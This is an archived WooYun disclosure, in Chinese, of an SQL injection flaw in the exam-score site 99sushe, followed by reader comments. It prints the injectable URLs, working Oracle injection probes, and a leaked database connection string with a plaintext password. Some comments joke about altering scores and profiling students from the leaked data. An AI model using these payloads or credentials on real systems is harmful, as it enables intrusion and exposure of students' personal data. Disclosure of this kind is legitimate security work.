当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-05402

漏洞标题:99宿舍注入,可导致信息泄露

相关厂商:99宿舍

漏洞作者: m4kar0f

提交时间:2012-03-20 12:41

修复时间:2012-05-04 12:42

公开时间:2012-05-04 12:42

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:5

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-03-20: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-05-04: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

99宿舍是查询四六级成绩的地方,网站使用oracle数据库,存在注入,期中信息量是非常大的,如果数据泄露,你们懂得。

详细说明:

http://tkk.99sushe.com/coursecommentlist.aspx?id=51
http://tkk.99sushe.com/columncontentlist.aspx?id=48都存在注入
并且配置不当导致遍历 目测泄露了数据库用户密码
http://tkk.99sushe.com/log/20120317.txt
Password=dorm2008guichuangdb;User ID=DORMDBUSER;Data Source=aixdormdb;

漏洞证明:

http://tkk.99sushe.com/columncontentlist.aspx?id=48%20and%20(select%20count(*)%20from%20user_tab_columns%20where%20table_name%20like%20'%25USER%25'%20and%20column_name%20like%20'%25USERNAME%25')%3E19--返回正确 说明存在USER表
http://tkk.99sushe.com/coursecommentlist.aspx?id=51 order by 13--;错误
http://tkk.99sushe.com/coursecommentlist.aspx?id=51 order by 12--;正确 存在12个表

修复方案:

过滤 设置权限

版权声明:转载请注明来源 m4kar0f@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

评论

  1. 2012-03-20 13:05 | horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)

    其实真搞不明白为啥这分数要给第三方公司运营......

  2. 2012-03-20 19:57 | tpu01yzx ( 实习白帽子 | Rank:58 漏洞数:8 | test)

    拖苦了吗?懂住别偷看偶的四六级成绩哈,上部起啊。

  3. 2012-03-20 20:14 | Valo洛洛 ( 普通白帽子 | Rank:458 漏洞数:52 | 。)

    @tpu01yzx 亲 你错别字好多 - -

  4. 2012-03-20 21:53 | 猪头子 ( 普通白帽子 | Rank:189 漏洞数:35 | 自信的看着队友rm -rf/tar挂服务器)

    求该成绩

  5. 2012-03-22 11:42 | wormcy ( 路人 | Rank:19 漏洞数:3 | 扒洞 球变身.)

    @horseluke 99宿舍上头有人 百度一下 全都知道

  6. 2012-03-22 13:29 | 大肠 ( 路人 | Rank:0 漏洞数:1 | 入侵研究 seo技术)

    老子买了答案没过 反而我给另外2个人答案的人过了 妈的 伤不起啊。。。

  7. 2012-03-22 13:50 | m4kar0f ( 路人 | Rank:0 漏洞数:1 | 我不是马卡洛夫,也不是恐怖头子,但是我很...)

    @大肠 你是个悲剧

  8. 2012-03-22 13:50 | m4kar0f ( 路人 | Rank:0 漏洞数:1 | 我不是马卡洛夫,也不是恐怖头子,但是我很...)

    @猪头子 我也求。。

  9. 2012-03-22 16:09 | 瓜瓜 ( 普通白帽子 | Rank:173 漏洞数:25 )

    @大肠 求今年答案

  10. 2012-03-22 22:27 | wormcy ( 路人 | Rank:19 漏洞数:3 | 扒洞 球变身.)

    哎呀 今天刚交了32的六级报名费 求过....

  11. 2012-03-28 09:31 | 冰锋刺客 ( 普通白帽子 | Rank:113 漏洞数:14 | 请在监护人陪同下与本人交流)

    要考六级囖 -_-'

  12. 2012-05-04 14:08 | lazypeople ( 路人 | Rank:22 漏洞数:6 )

    So rubbish the site is.

  13. 2012-05-04 14:40 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    以后搞个图啊 各位 你这最后一补 什么玩意都没剩下

  14. 2012-05-04 15:33 | Mr.杨总 ( 路人 | Rank:14 漏洞数:4 | 绿色 无毒 你懂得。。。。心要宽 。。。)

    唉。。。。坐等公开

  15. 2012-05-04 15:52 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @Mr.杨总 哥,已经公开了

  16. 2012-05-04 17:51 | 冷冷的夜 ( 普通白帽子 | Rank:135 漏洞数:12 )

    碉堡了,这个搞定了,以后实现的境界就是,路上看见个大学生妹子,一见面,就说你叫XXX,你身份证是XXX,现在XX岁,你四级考了多少,六级考了多少

  17. 2012-05-04 20:12 | popok ( 普通白帽子 | Rank:117 漏洞数:24 | nothing)

    这个站和考试那些部门什么关系?总能提前拿到成绩。。前段时间出的那个查分保护盾,操蛋,安装后修改LSP。

  18. 2013-03-04 17:40 | 刘陈 ( 路人 | Rank:10 漏洞数:6 )

    这个赚钱呢。求改成绩!